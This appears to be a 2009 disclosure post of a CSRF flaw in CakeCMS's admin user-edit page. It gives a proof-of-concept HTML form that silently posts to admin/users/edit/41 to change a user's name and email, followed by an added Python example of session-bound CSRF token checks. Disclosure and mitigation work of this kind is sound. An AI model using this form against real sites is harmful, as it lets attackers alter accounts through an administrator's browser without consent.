
CakeCMS XSRF Vulnerability


onur.tu...@hotmail.com

Jun 15, 2009, 1:23:48 PM
< ------------------- header data start ------------------- >

#########################################################

# Application Name : CakeCMS

# Vulnerable Type : Edit USER (XSRF) Vuln

# author : MnmL ~ Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm">
<fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset>
<input type="hidden" id="UserId" value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="ds...@dsada.com" id="UserEmail"/>

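An added defensive example, not part of the original post and not CakeCMS code: the form in the post carries no per-session secret, so the server cannot tell a request built by another site from one sent by its own edit page. The code below binds a token to the session and rejects the edit request without it; the `csrf_token` field name, the key handling and the sample session ids are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumption: one server-side secret per deployment (generated per run here).
SERVER_KEY = secrets.token_bytes(32)
TOKEN_FIELD = "csrf_token"  # hypothetical field name, not CakeCMS's own


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}|{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def mint_token(session_id: str) -> str:
    """Token embedded in the form the server renders: 'nonce.mac'."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac_hex = token.partition(".")
    if not (sep and nonce and mac_hex):
        return False
    return hmac.compare_digest(_mac(session_id, nonce).encode(), mac_hex.encode())


def authorize_edit(session_id: str, post_fields: dict) -> bool:
    """Gate for a state-changing request such as admin/users/edit/<id>."""
    token = post_fields.get(TOKEN_FIELD, "")
    return isinstance(token, str) and token_is_valid(session_id, token)


# Constructed sample requests; field names are those of the form in the post.
ADMIN_SESSION = "constructed-admin-session-id"
cross_site_post = {  # fields a third-party page can supply; it has no token
    "_method": "PUT",
    "data[User][id]": "41",
    "data[User][name]": "dsada",
    "data[User][email]": "user@example.com",  # constructed value
}
same_site_post = {**cross_site_post, TOKEN_FIELD: mint_token(ADMIN_SESSION)}
other_session_post = {**cross_site_post, TOKEN_FIELD: mint_token("other-session")}

if __name__ == "__main__":
    for label, req in (("cross-site", cross_site_post), ("same-site", same_site_post),
                       ("other session's token", other_session_post)):
        print(f"{label:22} accepted={authorize_edit(ADMIN_SESSION, req)}")
```

The token must be checked on every state-changing admin route, not only the user edit action.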